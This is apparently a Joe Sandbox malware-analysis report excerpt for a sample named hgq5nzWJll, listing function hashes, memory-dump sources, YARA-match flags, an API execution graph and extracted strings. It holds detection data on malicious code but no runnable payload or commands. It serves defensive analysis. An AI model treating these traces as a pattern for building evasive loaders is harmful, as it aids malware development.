                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dff4380721deeee2c570eeff60496647c5b84dac036d16c5612896a83995759d
                                                  • Instruction ID: 50644d6418fa62ad9c9cd0a5270d35014c0eebdb830edae07f30cbb006e2e560
                                                  • Opcode Fuzzy Hash: dff4380721deeee2c570eeff60496647c5b84dac036d16c5612896a83995759d
                                                  • Instruction Fuzzy Hash: 3FE1E5B4E002198FCB15DFA9C5919AEBBF2FF89305F24C169D414AB355DB31A942CFA0
                                                  Function 071CC018 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5d460b1480bb464bc7f2a2505f05fabe44a446829517a34447bd70d639d36a0
                                                  • Instruction ID: f45a2c655fc0b558d80889de9284a06c987ac16735b02d977bfab0d6c5a3e1e1
                                                  • Opcode Fuzzy Hash: c5d460b1480bb464bc7f2a2505f05fabe44a446829517a34447bd70d639d36a0
                                                  • Instruction Fuzzy Hash: 8CE1D5B4E041598FCB14DFA9C5809AEBBF2FF89305F2481A9D418AB355D730AD42CFA1
                                                  Function 071C9F68 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8962ec7ba1ad65f284a66e76cb2948e0d166e1744bdab96dc30347984ca6b6a4
                                                  • Instruction ID: 1a66bcf86e1785f229596f179758b765e1527e91bfbad68ae8162a79dfb3103d
                                                  • Opcode Fuzzy Hash: 8962ec7ba1ad65f284a66e76cb2948e0d166e1744bdab96dc30347984ca6b6a4
                                                  • Instruction Fuzzy Hash: 85E1F4B4E001598FCB15DFA9C9809AEBBF2FF89304F24C169D414AB355DB31A942CFA0
                                                  Function 071CAC10 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef482c3e8143dbd4c0711e0b44c5a88b73a912f5b3ee10020c5dbc972f3e560d
                                                  • Instruction ID: ac93c5d6360633ac65ff11e16b2e7777aaac501d9b7d3da818f27f62a5f1e045
                                                  • Opcode Fuzzy Hash: ef482c3e8143dbd4c0711e0b44c5a88b73a912f5b3ee10020c5dbc972f3e560d
                                                  • Instruction Fuzzy Hash: 9AE1F5B4E042598FCB15DFA9C5809AEBBF2FF89305F24C169D414AB359D730A942CFA1
                                                  Function 02AADD14 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1389033174.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2aa0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4ec7249d1bab58ab891c88f79f3ccc7a2fba4b38da1c2a3a3f4a5aca34dad29
                                                  • Instruction ID: 8ae5b05fb4e244cde6fe0f4e57c2a5dbbd05cfe592c3c445cfa244d85db0e8ee
                                                  • Opcode Fuzzy Hash: e4ec7249d1bab58ab891c88f79f3ccc7a2fba4b38da1c2a3a3f4a5aca34dad29
                                                  • Instruction Fuzzy Hash: 00A17C32E016058FCF09DFB4C9905EEB7B2FF85304B1585AAE805AB255EF32E955CB80
                                                  Function 051B0006 Relevance: .2, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399107829.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51b0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bc6cf334433b25e2198ebacb2262210ca3de96ea061c81c400b9871e68c3a36
                                                  • Instruction ID: 71367311ecc907d721d35e98511812b203c5eb3ae11476a880095e1868efbe92
                                                  • Opcode Fuzzy Hash: 0bc6cf334433b25e2198ebacb2262210ca3de96ea061c81c400b9871e68c3a36
                                                  • Instruction Fuzzy Hash: CEC13DB0C827458FD320CF25E9685C93BB1FB85394F944E09D161AB2E5EBB814AACF54
                                                  Function 071CA7C8 Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d4a69f93264bf15ceea4c291f7bd948ee827fc47a1b5ec38f4c124f8e03bf0a
                                                  • Instruction ID: e8c664e22ea23a2e3f9bc1fb2b0090027164c253e4c047117c2050c0fb3fc871
                                                  • Opcode Fuzzy Hash: 3d4a69f93264bf15ceea4c291f7bd948ee827fc47a1b5ec38f4c124f8e03bf0a
                                                  • Instruction Fuzzy Hash: F351F9B5E002198FCB14DFA9CA815AEFBF2FF89305F24C169D418AB255D7319942CFA0

                                                  Execution Graph

                                                  Execution Coverage:1.1%
                                                  Dynamic/Decrypted Code Coverage:5.5%
                                                  Signature Coverage:8.7%
                                                  Total number of Nodes:127
                                                  Total number of Limit Nodes:8
                                                  execution_graph 95007 424a03 95008 424a1f 95007->95008 95009 424a47 95008->95009 95010 424a5b 95008->95010 95012 42c713 NtClose 95009->95012 95017 42c713 95010->95017 95014 424a50 95012->95014 95013 424a64 95020 42e8d3 RtlAllocateHeap 95013->95020 95016 424a6f 95018 42c72d 95017->95018 95019 42c73e NtClose 95018->95019 95019->95013 95020->95016 95021 42f983 95022 42f8f3 95021->95022 95023 42f950 95022->95023 95027 42e893 95022->95027 95025 42f92d 95030 42e7b3 95025->95030 95033 42ca53 95027->95033 95029 42e8ae 95029->95025 95036 42caa3 95030->95036 95032 42e7cc 95032->95023 95034 42ca6d 95033->95034 95035 42ca7e RtlAllocateHeap 95034->95035 95035->95029 95037 42cabd 95036->95037 95038 42cace RtlFreeHeap 95037->95038 95038->95032 95125 42f853 95126 42f863 95125->95126 95127 42f869 95125->95127 95128 42e893 RtlAllocateHeap 95127->95128 95129 42f88f 95128->95129 95130 424d93 95131 424dac 95130->95131 95132 424df7 95131->95132 95135 424e37 95131->95135 95137 424e3c 95131->95137 95133 42e7b3 RtlFreeHeap 95132->95133 95134 424e07 95133->95134 95136 42e7b3 RtlFreeHeap 95135->95136 95136->95137 95142 42bce3 95143 42bd00 95142->95143 95146 18b2df0 LdrInitializeThunk 95143->95146 95144 42bd28 95146->95144 95138 41b2d3 95139 41b317 95138->95139 95140 41b338 95139->95140 95141 42c713 NtClose 95139->95141 95141->95140 95147 413ba3 95150 42c9b3 95147->95150 95151 42c9cd 95150->95151 95154 18b2c70 LdrInitializeThunk 95151->95154 95152 413bc5 95154->95152 95156 4140f3 95157 414100 95156->95157 95162 417823 95157->95162 95159 414127 95160 414173 95159->95160 95161 414160 PostThreadMessageW 95159->95161 95161->95160 95163 417847 95162->95163 95164 417883 LdrLoadDll 95163->95164 95165 41784e 95163->95165 95164->95165 95165->95159 95039 418dc8 95040 42c713 NtClose 95039->95040 95041 418dd2 95040->95041 95155 18b2b60 LdrInitializeThunk 95042 401b4f 95043 401b64 95042->95043 95046 42fd23 95043->95046 95049 42e373 95046->95049 95050 42e399 95049->95050 95061 407473 95050->95061 95052 42e3af 95060 401c13 95052->95060 95064 41b0e3 95052->95064 95054 42e3ce 95055 42e3e3 95054->95055 95079 42caf3 95054->95079 95075 428273 95055->95075 95058 42e3fd 95059 42caf3 ExitProcess 95058->95059 95059->95060 95063 407480 95061->95063 95082 4164e3 95061->95082 95063->95052 95065 41b10f 95064->95065 95100 41afd3 95065->95100 95068 41b154 95071 41b170 95068->95071 95073 42c713 NtClose 95068->95073 95069 41b13c 95070 41b147 95069->95070 95072 42c713 NtClose 95069->95072 95070->95054 95071->95054 95072->95070 95074 41b166 95073->95074 95074->95054 95076 4282d5 95075->95076 95078 4282e2 95076->95078 95111 418683 95076->95111 95078->95058 95080 42cb0d 95079->95080 95081 42cb1e ExitProcess 95080->95081 95081->95055 95083 416500 95082->95083 95085 416519 95083->95085 95086 42d193 95083->95086 95085->95063 95088 42d1ad 95086->95088 95087 42d1dc 95087->95085 95088->95087 95093 42bd33 95088->95093 95091 42e7b3 RtlFreeHeap 95092 42d24f 95091->95092 95092->95085 95094 42bd50 95093->95094 95097 18b2c0a 95094->95097 95095 42bd7c 95095->95091 95098 18b2c1f LdrInitializeThunk 95097->95098 95099 18b2c11 95097->95099 95098->95095 95099->95095 95101 41b0c9 95100->95101 95102 41afed 95100->95102 95101->95068 95101->95069 95106 42bdd3 95102->95106 95105 42c713 NtClose 95105->95101 95107 42bdf0 95106->95107 95110 18b35c0 LdrInitializeThunk 95107->95110 95108 41b0bd 95108->95105 95110->95108 95113 4186ad 95111->95113 95112 418bab 95112->95078 95113->95112 95119 413d83 95113->95119 95115 4187d4 95115->95112 95116 42e7b3 RtlFreeHeap 95115->95116 95117 4187ec 95116->95117 95117->95112 95118 42caf3 ExitProcess 95117->95118 95118->95112 95123 413da0 95119->95123 95121 413dfc 95121->95115 95122 413e06 95122->95115 95123->95122 95124 41b3f3 RtlFreeHeap LdrInitializeThunk 95123->95124 95124->95121

                                                  Executed Functions

                                                  Function 00417823 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 95 417823-41783f 96 417847-41784c 95->96 97 417842 call 42f393 95->97 98 417852-417860 call 42f993 96->98 99 41784e-417851 96->99 97->96 102 417870-417881 call 42de43 98->102 103 417862-41786d call 42fc33 98->103 108 417883-417897 LdrLoadDll 102->108 109 41789a-41789d 102->109 103->102 108->109
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417895
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hgq5nzWJll.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 0396ba7618b5080a1dab921aa9300dfb6cdc16ec2d0a8df7c2b88b16f96075f0
                                                  • Instruction ID: 29ab4178b623f9d5cb1a825787069ef2dd384c0f0d8505a4629b59b45d4eae07
                                                  • Opcode Fuzzy Hash: 0396ba7618b5080a1dab921aa9300dfb6cdc16ec2d0a8df7c2b88b16f96075f0
                                                  • Instruction Fuzzy Hash: BC0152B5E0010DA7DF10EBA1DC42FDEB3789B54308F4041AAE90897241F634EB48CB95
                                                  Function 0042C713 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 115 42c713-42c74c call 4048d3 call 42d983 NtClose
                                                  APIs
                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C747
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hgq5nzWJll.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 29ccce100494c67d4f1b09088285493934354a39b66b0afe61a6abcbbcb7c63c
                                                  • Instruction ID: ab54a8886db9e3a83fd3f079c0634e3db54f3b12062865509fe12da72bd61821
                                                  • Opcode Fuzzy Hash: 29ccce100494c67d4f1b09088285493934354a39b66b0afe61a6abcbbcb7c63c
                                                  • Instruction Fuzzy Hash: 06E086762402147BD610FA5ADC41F9BB75DDFC5714F004429FA48A7141C6717911C7F4
                                                  Function 018B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 18b2b60-18b2b6c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bc8ddb1fb88503ba4e10f8379f955c8df525c5dbe0023c60aafb8b275529b61e
                                                  • Instruction ID: 5eebf3fa51b0afa2ce1137e2f5ea1102c8a87ce1a89886a412ca12062c78be1e
                                                  • Opcode Fuzzy Hash: bc8ddb1fb88503ba4e10f8379f955c8df525c5dbe0023c60aafb8b275529b61e
                                                  • Instruction Fuzzy Hash: 46900261242400074105715D4414616400A97E1701B55C025E2018590DC536CA956226
                                                  Function 018B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: aab8f2e4c5eb39cd2b64be77424f0c170a52b3dbd0c6895b1cc32a39ee0c9b2e
                                                  • Instruction ID: 199e189fde230c93e8f04d43e4b57a2a93ebf43905fdc4b7662ff911a61e0f6e
                                                  • Opcode Fuzzy Hash: aab8f2e4c5eb39cd2b64be77424f0c170a52b3dbd0c6895b1cc32a39ee0c9b2e
                                                  • Instruction Fuzzy Hash: 4790023124140417D111715D4504707000997D1741F95C416A1428558DD667CB56A222
                                                  Function 018B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 130 18b2c70-18b2c7c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 21a19fc3638c5428332354cafba08dc871c08a8a3587fd63c24fc35ed73a2f90
                                                  • Instruction ID: bbb0d8d3a724a12f9dc6a15a07b11e6305e399fd82f936c967f6b5bcbea61fc9
                                                  • Opcode Fuzzy Hash: 21a19fc3638c5428332354cafba08dc871c08a8a3587fd63c24fc35ed73a2f90
                                                  • Instruction Fuzzy Hash: F090023124148806D110715D840474A000597D1701F59C415A5428658DC6A6CA957222
                                                  Function 018B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 634f336f402984a0a855d45be35a2e38d763ef83d4d3517d0263dd106121fef6
                                                  • Instruction ID: f04022c4845ea93dbcaf6ca1873116e5a26f1292aea210a67b86101e3331d4a0
                                                  • Opcode Fuzzy Hash: 634f336f402984a0a855d45be35a2e38d763ef83d4d3517d0263dd106121fef6
                                                  • Instruction Fuzzy Hash: 1790023164550406D100715D4514706100597D1701F65C415A1428568DC7A6CB5566A3
                                                  Function 004140A2 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 75threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hgq5nzWJll.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: -69O$-q<$G8uE$G8uE-69OL$G8uE-69OL
                                                  • API String ID: 1836367815-1308402997
                                                  • Opcode ID: 4a7549dc291047607dc34c6eec3bb7cc46a4129a54e39d764c9277ff9e5f347a
                                                  • Instruction ID: 376b1731d0f3bba1e6e74f86399266947dd6ae6205731cb07838efac425f82cb
                                                  • Opcode Fuzzy Hash: 4a7549dc291047607dc34c6eec3bb7cc46a4129a54e39d764c9277ff9e5f347a
                                                  • Instruction Fuzzy Hash: 0C118972E4102435D711AE55DC01FDFBFA8DB80B20F05412AF700AB141D77CA64287A8
                                                  Function 004140B8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 18 4140b8-4140c0 19 414100-414141 call 42e853 call 42f263 call 417823 call 404843 call 424ec3 18->19 20 4140c2-4140e3 18->20 22 414144-41415e 19->22 21 4140e5 20->21 20->22 26 4140e6 21->26 24 414180-414185 22->24 25 414160-414171 PostThreadMessageW 22->25 25->24 29 414173-41417d 25->29 26->26 30 4140e8-4140f1 26->30 29->24 30->19
                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hgq5nzWJll.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: -69O$G8uE$G8uE-69OL$G8uE-69OL
                                                  • API String ID: 1836367815-2690296174
                                                  • Opcode ID: 6b839f6249b27768497eb7eb58a37aca188b8480f76df8be92d11f4c1489660f
                                                  • Instruction ID: cc1790c02d786663a4433e2c8f495a403b356d7deedf6d12b4446235fbcd5af2
                                                  • Opcode Fuzzy Hash: 6b839f6249b27768497eb7eb58a37aca188b8480f76df8be92d11f4c1489660f
                                                  • Instruction Fuzzy Hash: 28117F72E452087ADB209AA4EC42FEF7B789F80714F01815AFA14BB241C77D594687E9
                                                  Function 004140F3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hgq5nzWJll.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: -69O$G8uE$G8uE-69OL$G8uE-69OL
                                                  • API String ID: 1836367815-2690296174
                                                  • Opcode ID: a80d168c6a128c902df28832f9bb460c61be71fb933f6642e8c82d39a2b65a9f
                                                  • Instruction ID: 430fca5e306dda3203284aeb1e46c3d4f24b5f9102c314fafe372dba7b91ba21
                                                  • Opcode Fuzzy Hash: a80d168c6a128c902df28832f9bb460c61be71fb933f6642e8c82d39a2b65a9f
                                                  • Instruction Fuzzy Hash: F401D671E4121876EB21AAD19C06FDF7B7C9F80B14F018069FA107B281D6BC6A0687E9
                                                  Function 0042CAA3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 56 42caa3-42cae4 call 4048d3 call 42d983 RtlFreeHeap
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CADF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hgq5nzWJll.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: keA
                                                  • API String ID: 3298025750-2727482167
                                                  • Opcode ID: 681bd1f20ea3189675e17e877edd0f8c4eeb3f41bfc2e57b4ac409f35e7157c1
                                                  • Instruction ID: e834b4b46261a5b62c8c7761e0b4186ee00804b3b51d1bb597083c27661f655a
                                                  • Opcode Fuzzy Hash: 681bd1f20ea3189675e17e877edd0f8c4eeb3f41bfc2e57b4ac409f35e7157c1
                                                  • Instruction Fuzzy Hash: 2FE06DB26002047BD614EF59DC41E9B73ADEFC8710F004419F948A7241C670B9118BB8
                                                  Function 0042CA53 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 110 42ca53-42ca94 call 4048d3 call 42d983 RtlAllocateHeap
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,0041E57B,?,?,00000000,?,0041E57B,?,?,?), ref: 0042CA8F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hgq5nzWJll.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 8a700a8c3a0a144c91516dd14f57180c07477dd7731598e4d6a2530fd7bb92eb
                                                  • Instruction ID: a22f2ec269460c622849d002825711464a6409f01001f71476e2b7095da17035
                                                  • Opcode Fuzzy Hash: 8a700a8c3a0a144c91516dd14f57180c07477dd7731598e4d6a2530fd7bb92eb
                                                  • Instruction Fuzzy Hash: D8E06DB26042047BC710EE59EC42F9B77ADEFC4714F004419F908A7241C670B9108BB9
                                                  Function 0042CAF3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 120 42caf3-42cb2c call 4048d3 call 42d983 ExitProcess
                                                  APIs
                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,298863EF,?,?,298863EF), ref: 0042CB27
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hgq5nzWJll.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: dea030b86dc1f118d82cbf4bf509753bfed93b4a73e356208daf87d09624a864
                                                  • Instruction ID: 22873bfc0b9772659a6fadeb203f8fc64cab6d9e76b8b20e473718e1edfaeb86
                                                  • Opcode Fuzzy Hash: dea030b86dc1f118d82cbf4bf509753bfed93b4a73e356208daf87d09624a864
                                                  • Instruction Fuzzy Hash: 8FE086762006147BC610FA5ADC05F9B7B5DDFC5714F004429FA48E7141C775B91087F5
                                                  Function 018B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 125 18b2c0a-18b2c0f 126 18b2c1f-18b2c26 LdrInitializeThunk 125->126 127 18b2c11-18b2c18 125->127
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 610b48e6f3cab9a031956360b59c9336fc0a3a3c5248c558f35ac404db7927b6
                                                  • Instruction ID: 4b77674d4dbefe83a87c7dc1cf0304e4724d4d3c18c03f89c858e8ab77bdea39
                                                  • Opcode Fuzzy Hash: 610b48e6f3cab9a031956360b59c9336fc0a3a3c5248c558f35ac404db7927b6
                                                  • Instruction Fuzzy Hash: BBB09B719415C5C9DA11E76446087177A0177D1701F15C065D3034651F4739D6D5E276

                                                  Non-executed Functions

                                                  Function 018F2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2160512332
                                                  • Opcode ID: 0052709be20e21382aa2383beb9c9b858ac98fd42ade29cf880151acc7f41220
                                                  • Instruction ID: adb433bd981b6fa9f71931a8ee3dd5a5583e67c7e233eed7547dd57bcaa829f3
                                                  • Opcode Fuzzy Hash: 0052709be20e21382aa2383beb9c9b858ac98fd42ade29cf880151acc7f41220
                                                  • Instruction Fuzzy Hash: 2B929D71608746ABE721DF28C880B6BB7EAFB84754F04481DFB94D7291D770EA44CB92
                                                  Function 018A8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Critical section debug info address, xrefs: 018E541F, 018E552E
                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018E54E2
                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018E540A, 018E5496, 018E5519
                                                  • Address of the debug info found in the active list., xrefs: 018E54AE, 018E54FA
                                                  • Thread identifier, xrefs: 018E553A
                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 018E5543
                                                  • Critical section address., xrefs: 018E5502
                                                  • double initialized or corrupted critical section, xrefs: 018E5508
                                                  • undeleted critical section in freed memory, xrefs: 018E542B
                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018E54CE
                                                  • 8, xrefs: 018E52E3
                                                  • Invalid debug info address of this critical section, xrefs: 018E54B6
                                                  • Critical section address, xrefs: 018E5425, 018E54BC, 018E5534
                                                  • corrupted critical section, xrefs: 018E54C2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
